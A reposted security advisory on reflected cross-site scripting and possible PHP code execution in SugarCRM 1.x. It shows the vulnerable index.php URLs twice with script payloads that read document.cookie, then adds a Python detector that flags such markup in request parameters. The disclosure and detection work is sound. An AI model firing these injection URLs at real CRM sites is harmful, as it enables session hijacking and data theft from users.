[Repost] Testing methods for the SugarCRM cross-site scripting and code execution vulnerabilities
Source: [url]www.securityfocus.com[/url]
Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM
Added by: A^C^E
Date: 02.01.05
Time: 09:52:34
Category: Exploits
Source: [url]http://www.securityfocus.com/archive/1/385884/2004-12-30/2005-01-05/0[/url]
----------------------------------------------------------------------------
Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM
----------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of a
state-of-the-art user interface. Built on PHP and MySQL
Web : [url]http://sugarcrm.sourceforge.net[/url]
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross Site Scripting Vulnerability
A1. In the main script (index.php), various parameters that are used to
write the HTML code are not verified.
At least the following URLs are vulnerable to XSS (Cross Site
Scripting) attacks:
http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index
http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script>
http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search
The following are vulnerable to XSS and may also be vulnerable to
arbitrary remote PHP code execution:
http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d
http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD ID]"><script>alert(document.cookie)</script>
The fix:
~~~~~~~~
All problems are fixed in the latest versions available at the
SugarCRM site.
Go to the [url]http://sugarcrm.sourceforge.net[/url] site for more info about the new
versions.
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
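Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
Translation site: [url]http://www.bnso.net[/url]
Bug.Center.team translation group
Source: Joxean Koret <joxeankoret () yahoo ! es>
Date: 2005-01-01 19:58:44
Security advisory: <1104609524.17665.4.camel () nemobox>
Description of affected software:
SugarCRM 1.X manages leads, opportunities, contacts and more, all inside a state-of-the-art user interface. It is built on PHP and MySQL.
Website: [url]http://sugarcrm.sourceforge.net[/url]
Vulnerability description: cross-site scripting vulnerability
In the main script (index.php), various parameters that are used to write the HTML code are not verified.
At least the following URLs are vulnerable to cross-site scripting attacks: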
http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index
http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script>
http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search
The following URLs are vulnerable to cross-site scripting and may also allow remote execution of arbitrary PHP code:
http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d
http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD ID]"><script>alert(document.cookie)</script>
Fix: upgrade to the latest version
URL: [url]http://sugarcrm.sourceforge.net[/url]
Discovered by: Jose Antonio Coret (Joxean Koret)
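
An added example, not part of the advisory or of SugarCRM's code: a Python check that flags index.php requests whose parameters carry the kind of markup shown in the advisory, usable as an input allowlist or over web server logs. The value shapes (plain identifiers for module, action, return_module and return_action, a GUID for record), the host crm.example.test and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed value shapes, not taken from SugarCRM's source: routing parameters
# are plain identifiers; record is a GUID like the one quoted in the advisory.
IDENT = re.compile(r"[A-Za-z0-9_]+")
GUID = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")
STRICT = {"module": IDENT, "action": IDENT, "return_module": IDENT,
          "return_action": IDENT, "record": GUID}
# Characters that let a reflected value close an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")


def suspicious_params(url):
    """Return the sorted names of query parameters whose decoded value is suspect."""
    hits = set()
    # parse_qsl percent-decodes, so encoded and raw payloads are treated alike.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if not value:                       # blank fields carry no payload
            continue
        rule = STRICT.get(name)
        if rule is not None:
            if not rule.fullmatch(value):   # allowlist: reject anything else
                hits.add(name)
        elif MARKUP.search(value):          # free-text fields: flag markup
            hits.add(name)
    return sorted(hits)


# Constructed samples: the advisory's request shapes on a placeholder host.
BASE = "http://crm.example.test/sugarcrm/index.php?"
PAYLOAD = '"><script>alert(document.cookie)</script>'
SAMPLES = [
    BASE + "module=Contacts&action=EditView&return_module=Accounts&return_action=index",
    BASE + "module=Contacts&action=EditView&return_module=" + PAYLOAD + "&return_action=index",
    BASE + "name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"
           "&action=ListView&query=true&module=Accounts&button=Search",
    BASE + "action=DetailView&module=Accounts" + PAYLOAD
         + "&record=d676f046-1be5-dc36-114e-4138f972bf5d",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(suspicious_params(url) or "clean", url[len(BASE):][:60])
```

The same allowlist applied server-side before the values are written into the page, together with HTML-encoding on output, addresses the reflected cases; upgrading as the advisory states remains the fix.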